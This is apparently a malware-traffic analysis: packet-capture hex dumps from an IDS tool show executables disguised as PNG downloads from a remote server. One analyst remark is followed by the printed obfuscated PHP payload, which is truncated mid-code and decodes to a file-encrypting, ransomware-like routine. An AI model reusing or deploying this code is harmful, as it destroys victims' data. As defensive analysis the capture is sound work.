     00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61         ...... ..`.rdata
     00 00 14 17 00 00 00 70 00 00 00 20 00 00 00 70         .......p... ...p
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00         ..............@.
     00 40 2e 64 61 74 61 00 00 00 28 26 00 00 00 90         .@.data...(&....
     00 00 00 10 00 00 00 90 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00         ......@....rsrc.
     00 00 08 04 00 00 00 c0 00 00 00 10 00 00 00 a0         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00         ..............@.
     00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00         .@..............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00                                             ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:643 matchs with (0x14b3be0)Regex [experimental0]
     48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d         HTTP/1.1 200 OK.
     0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a         .Content-Length:
     20 31 34 31 37 32 31 36 0d 0a 43 6f 6e 74 65 6e          1417216..Conten
     74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e         t-Type: image/pn
     67 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f         g..Server: Micro
     73 6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d         soft-IIS/7.5..X-
     50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f         Powered-By: PHP/
     35 2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d         5.4.14..Content-
     44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74         Disposition: att
     61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d         achment; filenam
     65 3d 36 62 37 34 65 2e 70 6e 67 0d 0a 58 2d 50         e=6b74e.png..X-P
     6f 77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e         owered-By: ASP.N
     45 54 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30         ET..Date: Wed, 0
     36 20 4a 75 6c 20 32 30 31 36 20 30 30 3a 31 33         6 Jul 2016 00:13
     3a 34 34 20 47 4d 54 0d 0a 0d 0a 4d 5a 90 00 03         :44 GMT....MZ...
     00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00         ................
     00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00         ...@............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00         ................
     b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72         ...!..L.!This pr
     6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20         ogram cannot be
     72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e         run in DOS mode.
     0d 0d 0a 24 00 00 00 00 00 00 00 ff 90 b5 04 bb         ...$............
     f1 db 57 bb f1 db 57 bb f1 db 57 c0 ed d7 57 a5         ..W...W...W...W.
     f1 db 57 38 ed d5 57 bf f1 db 57 8d d7 d1 57 b0         ..W8..W...W...W.
     f1 db 57 3c ed d9 57 94 f1 db 57 35 f9 84 57 be         ..W<..W...W5..W.
     f1 db 57 38 f9 86 57 b6 f1 db 57 bb f1 da 57 92         ..W8..W...W...W.
     f0 db 57 53 ee d1 57 ba f0 db 57 03 f7 dd 57 ba         ..WS..W...W...W.
     f1 db 57 53 ee df 57 b8 f1 db 57 52 69 63 68 bb         ..WS..W...WRich.
     f1 db 57 00 00 00 00 00 00 00 00 00 00 00 00 00         ..W.............
     00 00 00 50 45 00 00 4c 01 05 00 37 47 9b 48 00         ...PE..L...7G.H.
     00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00         ..........!.....
     30 10 00 00 10 06 00 00 00 00 00 15 3e 10 00 00         0...........>...
     10 00 00 00 40 10 00 00 00 00 10 00 10 00 00 00         ....@...........
     10 00 00 04 00 00 00 04 00 00 00 04 00 00 00 00         ................
     00 00 00 00 50 16 00 00 10 00 00 00 00 00 00 02         ....P...........
     00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00         ................
     10 00 00 00 00 00 00 10 00 00 00 40 94 11 00 60         ...........@...`
     5f 00 00 48 81 11 00 b4 00 00 00 00 70 15 00 00         _..H........p...
     04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 80 15 00 d8 bd 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 40 10 00 50         ............@..P
     05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74         ............text
     00 00 00 e6 2e 10 00 00 10 00 00 00 30 10 00 00         ............0...
     10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20         ...............
     00 00 60 2e 72 64 61 74 61 00 00 a0 b3 01 00 00         ..`.rdata.......
     40 10 00 00 c0 01 00 00 40 10 00 00 00 00 00 00         @.......@.......
     00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61         .......@..@.data
     00 00 00 e8 6f 03 00 00 00 12 00 00 c0 02 00 00         ....o...........
     00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40         ...............@
     00 00 c0 2e 72 73 72 63 00 00 00 00 04 00 00 00         ....rsrc........
     70 15 00 00 10 00 00 00 c0 14 00 00 00 00 00 00         p...............
     00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f         .......@..@.relo
     63 00 00 68 c7 00 00 00 80 15 00 00 d0 00 00 00         c..h............
     d0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40         ...............@
     00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00         ..B.............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00                                             ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:2585 matchs with (0x14b3be0)Regex [experimental0]
     48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d         HTTP/1.1 200 OK.
     0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a         .Content-Length:
     20 37 30 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54          7096..Content-T
     79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a         ype: image/png..
     53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66         Server: Microsof
     74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 6f 77         t-IIS/7.5..X-Pow
     65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34         ered-By: PHP/5.4
     2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73         .14..Content-Dis
     70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68         position: attach
     6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 37         ment; filename=7
     33 30 32 64 2e 70 6e 67 0d 0a 58 2d 50 6f 77 65         302d.png..X-Powe
     72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45 54 0d         red-By: ASP.NET.
     0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 4a         .Date: Wed, 06 J
     75 6c 20 32 30 31 36 20 30 30 3a 31 33 3a 34 38         ul 2016 00:13:48
     20 47 4d 54 0d 0a 0d 0a 3c 3f 70 68 70 20 24 6f          GMT....<?php $o
     34 34 38 3d 22 70 72 65 67 5f 72 22 2e 63 68 72         448="preg_r".chr
     28 31 30 31 29 2e 22 70 6c 22 2e 63 68 72 28 39         (101)."pl".chr(9
     37 29 2e 63 68 72 28 39 39 29 2e 22 65 22 3b 24         7).chr(99)."e";$
     78 34 33 38 3d 22 65 76 22 2e 63 68 72 28 39 37         x438="ev".chr(97
     29 2e 63 68 72 28 31 30 38 29 2e 63 68 72 28 34         ).chr(108).chr(4
     30 29 2e 22 62 61 73 65 36 34 22 2e 63 68 72 28         0)."base64".chr(
     39 35 29 2e 22 64 22 2e 63 68 72 28 31 30 31 29         95)."d".chr(101)
     2e 22 63 6f 64 65 28 22 2e 63 68 72 28 33 34 29         ."code(".chr(34)
     2e 22 63 32 56 30 58 33 52 70 22 2e 63 68 72 28         ."c2V0X3Rp".chr(
     39 38 29 2e 22 57 22 2e 63 68 72 28 38 36 29 2e         98)."W".chr(86).
     22 66 62 22 2e 63 68 72 28 37 31 29 2e 22 6c 74         "fb".chr(71)."lt
     61 22 2e 63 68 72 28 38 38 29 2e 22 51 6f 4d 22         a".chr(88)."QoM"
     2e 63 68 72 28 36 37 29 2e 22 6b 37 44 22 2e 63         .chr(67)."k7D".c
     68 72 28 38 31 29 2e 22 6f 4e 43 6d 5a 76 63 22         hr(81)."oNCmZvc"
     2e 63 68 72 28 31 30 35 29 2e 63 68 72 28 31 30         .chr(105).chr(10
     33 29 2e 22 6b 61 22 2e 63 68 72 28 38 34 29 2e         3)."ka".chr(84).
     22 30 22 2e 63 68 72 28 35 30 29 2e 22 4e 7a 73         "0".chr(50)."Nzs
     6b 61 54 77 39 4f 54 41 37 4a 47 22 2e 63 68 72         kaTw9OTA7JG".chr
     28 31 30 37 29 2e 22 72 22 2e 63 68 72 28 37 35         (107)."r".chr(75
     29 2e 22 79 6b 67 61 57 59 22 2e 63 68 72 28 31         )."ykgaWY".chr(1
     31 31 29 2e 22 51 22 2e 63 68 72 28 37 31 29 2e         11)."Q".chr(71).
     63 68 72 28 31 30 38 29 2e 63 68 72 28 31 32 32         chr(108).chr(122
     29 2e 22 58 22 2e 63 68 72 28 35 30 29 2e 22 52         )."X".chr(50)."R
     22 2e 63 68 72 28 31 31 32 29 2e 22 63 22 2e 63         ".chr(112)."c".c
     68 72 28 31 30 35 29 2e 22 68 6a 61 48 22 2e 63         hr(105)."hjaH".c
     68 72 28 37 33 29 2e 22 6f 4a 47 6b 70 4c 69 63         hr(73)."oJGkpLic
     36 22 2e 63 68 72 28 37 34 29 2e 22 79 6b 22 2e         6".chr(74)."yk".
     63 68 72 28 31 31 32 29 2e 22 49 46 22 2e 63 68         chr(112)."IF".ch
     72 28 38 32 29 2e 22 79 5a 57 22 2e 63 68 72 28         r(82)."yZW".chr(
     38 35 29 2e 22 6f 59 22 2e 63 68 72 28 35 30 29         85)."oY".chr(50)
     2e 22 68 79 4b 43 52 70 4b 53 34 6e 4f 69 22 2e         ."hyKCRpKS4nOi".
     63 68 72 28 39 39 29 2e 22 70 4f 77 22 2e 63 68         chr(99)."pOw".ch
     72 28 34 38 29 2e 22 4b 22 2e 63 68 72 28 36 38         r(48)."K".chr(68
     29 2e 22 51 22 2e 63 68 72 28 31 31 32 29 2e 22         )."Q".chr(112)."
     6d 22 2e 63 68 72 28 31 30 30 29 2e 22 57 35 6a         m".chr(100)."W5j
     22 2e 63 68 72 28 31 30 30 29 2e 22 47 6c 76 22         ".chr(100)."Glv"
     2e 63 68 72 28 39 38 29 2e 22 69 42 22 2e 63 68         .chr(98)."iB".ch
     72 28 38 35 29 2e 22 63 6d 56 6c 4b 43 52 77 4b         r(85)."cmVlKCRwK
     51 30 4b 65 22 2e 63 68 72 28 31 31 39 29 2e 22         Q0Ke".chr(119)."
     30 4b 43 53 52 68 50 22 2e 63 68 72 28 38 33 29         0KCSRhP".chr(83)
     2e 22 64 6c 4a 22 2e 63 68 72 28 31 32 32 29 2e         ."dlJ".chr(122).
     22 73 4e 22 2e 63 68 72 28 36 37 29 2e 22 67 22         "sN".chr(67)."g"
     2e 63 68 72 28 31 30 37 29 2e 22 6b 61 7a 31 69         .chr(107)."kaz1i
     59 58 4e 6c 4e 6a 22 2e 63 68 72 28 38 32 29 2e         YXNlNj".chr(82).
     22 66 22 2e 63 68 72 28 39 30 29 2e 22 47 56 6a         "f".chr(90)."GVj
     22 2e 63 68 72 28 39 38 29 2e 22 32 52 6c 4b 43         ".chr(98)."2RlKC
     22 2e 63 68 72 28 31 30 30 29 2e 22 4e 22 2e 63         ".chr(100)."N".c
     68 72 28 38 36 29 2e 22 30 74 55 57 6b 70 69 53         hr(86)."0tUWkpiS
     58 70 43 51 6c 22 2e 63 68 72 28 38 36 29 2e 22         XpCQl".chr(86)."
     75 51 55 35 78 4c 32 22 2e 63 68 72 28 34 39 29         uQU5xL2".chr(49)
     2e 22 55 53 32 31 22 2e 63 68 72 28 37 39 29 2e         ."US21".chr(79).
     22 64 32 22 2e 63 68 72 28 31 30 30 29 2e 22 69         "d2".chr(100)."i
     4f 47 64 22 2e 63 68 72 28 31 31 31 29 2e 22 64         OGd".chr(111)."d
     31 42 6e 64 7a 68 22 2e 63 68 72 28 37 32 29 2e         1Bndzh".chr(72).
     22 52 46 46 56 63 57 59 34 53 22 2e 63 68 72 28         "RFFVcWY4S".chr(
     31 30 39 29 2e 22 78 70 53 33 42 42 5a 48 22 2e         109)."xpS3BBZH".
     63 68 72 28 37 30 29 2e 22 7a 51 22 2e 63 68 72         chr(70)."zQ".chr
     28 34 38 29 2e 22 4e 52 54 6d 39 51 22 2e 63 68         (48)."NRTm9Q".ch
     72 28 38 35 29 2e 63 68 72 28 38 33 29 2e 22 74         r(85).chr(83)."t
     59 52 47 35 22 2e 63 68 72 28 31 30 36 29 2e 22         YRG5".chr(106)."
     54 6d 4d 72 65 22 2e 63 68 72 28 38 35 29 2e 22         TmMre".chr(85)."
     4a 43 22 2e 63 68 72 28 38 37 29 2e 22 54 22 2e         JC".chr(87)."T".
     63 68 72 28 38 36 29 2e 22 46 59 22 2e 63 68 72         chr(86)."FY".chr
     28 38 37 29 2e 22 39 75 22 2e 63 68 72 28 38 31         (87)."9u".chr(81
     29 2e 63 68 72 28 31 30 37 29 2e 22 4e 46 22 2e         ).chr(107)."NF".
     63 68 72 28 39 38 29 2e 22 46 42 57 56 30 22 2e         chr(98)."FBWV0".
     63 68 72 28 31 30 37 29 2e 22 7a 63 6c 4a 79 54         chr(107)."zclJyT
     7a 52 33 53 22 2e 63 68 72 28 36 38 29 2e 22 46         zR3S".chr(68)."F
     22 2e 63 68 72 28 31 31 32 29 2e 63 68 72 28 38         ".chr(112).chr(8
     35 29 2e 63 68 72 28 31 30 38 29 2e 22 6c 4e 55         5).chr(108)."lNU
     57 39 45 4d 32 4a 6b 53 30 22 2e 63 68 72 28 31         W9EM2JkS0".chr(1
     30 38 29 2e 22 36 64 7a 22 2e 63 68 72 28 39 30         08)."6dz".chr(90
     29 2e 22 44 51 6c 6c 4c 53 54 63 77 55 57 4a 5a         )."DQllLSTcwUWJZ
     22 2e 63 68 72 28 39 39 29 2e 22 6b 22 2e 63 68         ".chr(99)."k".ch
     72 28 34 39 29 2e 22 4b 22 2e 63 68 72 28 39 30         r(49)."K".chr(90
     29 2e 22 30 45 35 61 30 4e 22 2e 63 68 72 28 37         )."0E5a0N".chr(7
     36 29 2e 22                                             6).
PacketDispatcher(0x131ed10) statistics
    Connected to Lan network stack
    Total packets:                9130
    Total bytes:               6254270
RegexManager(0x14b3b10) statistics
    Regex:experimental0 matches:5

Exiting process

So the first four downloads are in fact fetching EXE files, and the last one is fetching some kind of obfuscated PHP code.

<?php $o448="preg_r".chr(101)."pl".chr(97).chr(99)."e";$x438="ev".chr(97).chr(108).chr(40)."base64".chr(95)."d".chr(101)."code(".chr(34)."c2V0X3Rp".chr(98)."W".chr(86)."fb".chr(71)."lta".chr(88)."QoM".chr(67)."k7D".chr(81)."oNCmZvc".chr(105).chr(103)."ka".chr(84)."0".chr(50)."NzskaTw9OTA7JG".chr(107)."r".chr(75)."ykgaWY".chr(111)."Q".chr(71).chr(108).chr(122)."X".chr(50)."R".chr(112)."c".chr(105)."hjaH".chr(73)."oJGkpLic6".chr(74)."yk".chr(112)."IF".chr(82)."yZW".chr(85)."oY".chr(50)."hyKCRpKS4nOi".chr(99)."pOw".chr(48)."K".chr(68)."Q".chr(112)."m".chr(100)."W5j".chr(100)."Glv".chr(98)."iB".chr(85)."cmVlKCRwKQ0Ke".chr(119)."0KCSRhP".chr(83)."dlJ".chr(122)."sN".chr(67)."g".chr(107)."kaz1iYXNlNj".chr(82)."f".chr(90)."GVj".chr(98)."2RlKC".chr(100)."N".chr(86)."0tUWkpiSXpCQl".chr(86)."uQU5xL2".chr(49)."US21".chr(79)."d2".chr(100)."iOGd".chr(111)."d1Bndzh".chr(72)."RFFVcWY4S".chr(109)."xpS3BBZH".chr(70)."zQ".chr(48)."NRTm9Q".chr(85).chr(83)."tYRG5".chr(106)."TmMre".chr(85)."JC".chr(87)."T".chr(86)."FY".chr(87)."9u".chr(81).chr(107)."NF".chr(98)."FBWV0".chr(107)."zclJyTzR3S".chr(68)."F".chr(112).chr(85).chr(108)."lNUW9EM2JkS0".chr(108)."6dz".chr(90)."DQllLSTcwUWJZ".chr(99)."k".chr(49)."K".chr(90)."0E5a0N".chr(76)."U".chr(85)."pMa3l6YWhMR0".chr(116)."Z".chr(74).chr(121)."k".chr(55)."D".chr(81)."oJ".chr(74)."HM9Y".chr(50)."hy".chr(75)."DkyKTsNC".chr(103)."0KCWlmKHByZ".chr(87)."dfbWF".chr(48)."Y2".chr(103)."oJy8nLiRzLiRzLicod2lub".chr(110)."R8".chr(89)."m9vdHxzeXN0ZW18d".chr(50)."luZG93c3x0bXB8dG".chr(86)."tcHxwcm9ncm".chr(70)."tfGFwcGRhdGF8YX".chr(66)."wbG".chr(108)."jYX".chr(82).chr(112).chr(98)."258".chr(99)."m9hb".chr(87)."luZ".chr(51)."xtc29".chr(109)."Zm".chr(108).chr(106)."ZXx0".chr(90)."W1wb3Jh".chr(99).chr(110)."l8Y2FjaGUpL".chr(50)."knLCRw".chr(75)."S".chr(66)."8fCBwc".chr(109).chr(86)."nX21".chr(104)."dGNoKC".chr(99)."vc".chr(109)."VjeWNsZ".chr(83)."9pJ".chr(121)."wkcCkpIHJ".chr(108)."dH".chr(86)."y".chr(98).chr(106)."sN".chr(67).chr(103)."0".chr(75)."CSRk".chr(99
)."D1".chr(65)."b3".chr(66)."lb".chr(109).chr(82)."pcigkcCk7".chr(68)."QoN".chr(67)."glpZi".chr(103)."kZHA".chr(57)."PT1mYWxz".chr(90)."SkgcmV0dXJuOw0KDQo".chr(74).chr(100).chr(50)."hpbGUoJG89QHJl".chr(89)."WRkaX".chr(73)."oJ".chr(71)."Rw".chr(75)."Sk".chr(103)."aWYoJG8hPScuJyYmJ".chr(71)."8".chr(104)."P".chr(83).chr(99)."uLi".chr(99)."pD".chr(81)."oJew0".chr(75)."C".chr(81).chr(108)."p".chr(90).chr(105)."Ao".chr(81)."Glz".chr(88)."2Rp".chr(99)."igkc".chr(67)."4k".chr(99).chr(121)."4k".chr(98)."ykpDQoJC".chr(88)."sN".chr(67)."gk".chr(74)."C".chr(86)."R".chr(121)."Z".chr(87)."U".chr(111)."J".chr(72).chr(65)."u".chr(74)."HM".chr(117)."JG8pOw".chr(48)."K".chr(67)."Q".chr(108)."9DQoJ".chr(67).chr(87)."V".chr(115).chr(99)."2Vp".chr(90)."iAoJGE9PSdlJyYmcHJlZ19tYX".chr(82)."ja".chr(67).chr(103)."nL1".chr(115)."uXS".chr(104)."6aXB8cmFyfHIwMHxy".chr(77)."DF".chr(56)."cjAy".chr(102)."HIwM".chr(51)."w3enx0YXJ8Z3".chr(112)."8Z".chr(51).chr(112).chr(112).chr(99)."H".chr(120)."hcmN8YXJqf".chr(71).chr(74)."6fG".chr(74)."6Mn".chr(120)."i".chr(101)."mF".chr(56)."YnppcHxie".chr(109)."l".chr(119)."MnxpY".chr(50)."V".chr(56).chr(101)."GxzfHh".chr(115)."c3h8Z".chr(71)."9jfGRvY3h".chr(56).chr(99)."GRmfGRqdnV".chr(56).chr(90)."m".chr(73)."yf".chr(72)."J0Znx".chr(119)."cHR8".chr(99)."HB0e".chr(72).chr(120)."w".chr(99)."HN8c3hpf".chr(71)."9kbXx".chr(118)."ZHR8bXBwf".chr(72)."Nza".chr(72).chr(120).chr(119)."d".chr(87)."J8".chr(90)."3Bn".chr(102).chr(72).chr(66).chr(110).chr(99)."HxrZGJ".chr(56)."a2Rie".chr(72)."x".chr(104)."b".chr(72)."N8YXVwfGN".chr(119)."cn".chr(120)."ucH".chr(74)."8Y3BwfGJhc3xhc2".chr(49)."8".chr(89).chr(51).chr(78)."8cGhwfHB".chr(104)."c3xjbG".chr(70)."zc3xweXxwb".chr(72)."xof".chr(72)."ZifHZjcHJvanx2Yn".chr(66).chr(121)."b2".chr(112).chr(56)."amF2YXxiYWt8Ym".chr(70)."ja3V".chr(119).chr(102)."G1kYnxhY2NkYnx".chr(116)."ZGZ8b2".chr(82).chr(105)."fHdkYnxjc".chr(51)."Z8dHN".chr(50)."fHNxb".chr(72)."xwc".chr(50)."R8Z".chr(88).chr(66)."zfGN".chr(107)."cnxjcH".chr(82).chr(56)."
a".chr(87).chr(53)."kZHxk".chr(100)."2d8YWl8c3ZnfG1heHxza3B8".chr(99)."2N".chr(104)."ZHxjYWR".chr(56).chr(77).chr(50)."RzfGJ".chr(115).chr(90)."W5kf".chr(71)."x3b3".chr(120)."sd3N8bWJ8c2xk".chr(90)."HJ3".chr(102)."HN".chr(115)."ZGFz".chr(98).chr(88)."x".chr(122)."bGRwc".chr(110)."R".chr(56)."dT".chr(78)."kfGpwZ3xqc".chr(71)."VnfH".chr(82)."pZmZ8".chr(100)."Glm".chr(102)."HJh".chr(100)."3xh".chr(100)."m".chr(108)."8".chr(98)."XBnfG1w".chr(78)."HxtNH".chr(90)."8bXBl".chr(90)."3xtcGV8d21mf".chr(72)."dtdnx".chr(50)."ZWd8".chr(98)."W92fD".chr(78)."ncHxmb".chr(72)."Z".chr(56).chr(98)."Wt2f".chr(72)."ZvYnx".chr(121)."bXxt".chr(99)."DN8d2".chr(70).chr(50)."fG".chr(70).chr(122)."Znx3".chr(98)."WF8b".chr(84)."N1".chr(102)."G1pZGl8b2dn".chr(102)."G1pZH".chr(120).chr(50)."ZGl".chr(56)."dm1".chr(107)."a".chr(51)."x2aGR8".chr(90)."HNr".chr(102)."GltZ3".chr(120)."pc28pJ".chr(67)."9".chr(112)."J".chr(121)."w".chr(107).chr(98)."ykgfHwgJGE9PSdkJyYmcHJl".chr(90)."19tYX".chr(82).chr(106).chr(97).chr(67)."gnL1suXShjcnlwdG".chr(86).chr(107)."K".chr(83)."Q".chr(118)."a".chr(83)."c".chr(115).chr(74)."G8pKQ0KCQl".chr(55)."DQ".chr(111)."JCQkkZn".chr(65)."9Q".chr(71)."ZvcG".chr(86)."uKCRwLiR".chr(122)."LiRvLC".chr(100)."yK".chr(121)."c".chr(112)."O".chr(119)."0K".chr(67)."QkJaWYgKCRmcCE9".chr(80)."WZ".chr(104)."bH".chr(78)."l".chr(75).chr(81)."0".chr(75)."CQkJew".chr(48)."KCQkJCS".chr(82)."4PUB".chr(109)."cmVhZ".chr(67)."gkZnAsMTAyN".chr(67)."k7DQoJCQkJ".chr(90)."m".chr(57)."yKCRpPTA".chr(55)."JG".chr(107).chr(56).chr(99)."3".chr(82)."yb".chr(71)."VuKCR".chr(52)."KTskaS".chr(115)."rKSR4WyRpXT1jaHIob3JkKCR4".chr(87)."yR".chr(112)."XSleb3Jk".chr(75)."C".chr(82)."rWyRpJXN".chr(48).chr(99)."mxlbigkayldKSk7".chr(68)."Q".chr(111)."J".chr(67)."Q".chr(107)."JQG".chr(90)."zZWV".chr(114).chr(75)."C".chr(82)."mc".chr(67)."wwKTsNCgkJCQl".chr(65)."Zndy".chr(97)."XR".chr(108)."KCRmcCwk".chr(101)."C".chr(107)."7DQoJ".chr(67)."Qk".chr(74)."Q".chr(71).chr(90)."jbG9zZS".chr(103).chr(107)."ZnApOw".chr(48)."K".c
hr(68)."Q".chr(111)."JCQkJaWYoJGE9PS".chr(100)."lJ".chr(121)."k".chr(78)."CgkJCQl7DQo".chr(74)."CQkJCUB".chr(121)."ZW".chr(53)."hb".chr(87)."Uo".chr(74)."H".chr(65)."uJ".chr(72)."Mu".chr(74)."G8s".chr(73)."C".chr(82).chr(119)."LiR".chr(122)."LiRvL".chr(105)."cu".chr(89)."3".chr(74)."5cH".chr(82)."lZCc".chr(112)."Ow0KCQk".chr(74)."C".chr(88)."0".chr(78).chr(67)."gkJCQll".chr(98)."HNlDQoJCQk".chr(74)."ew0".chr(75)."C".chr(81).chr(107)."J".chr(67).chr(81)."lAc".chr(109)."Vu".chr(89)."W1lKC".chr(82)."wLiRzLiR".chr(118)."LCBw".chr(99)."m".chr(86)."nX3J".chr(108).chr(99).chr(71).chr(120)."hY2Uo".chr(74)."y9bL".chr(108)."1jc".chr(110)."lw".chr(100)."GV".chr(107)."JC8n".chr(76).chr(67)."AnJywgJHAuJHMuJG".chr(56).chr(112)."K".chr(84).chr(115)."N".chr(67)."gk".chr(74)."CQl9DQoJCQl9DQoJCX0NCgl9DQoNC".chr(1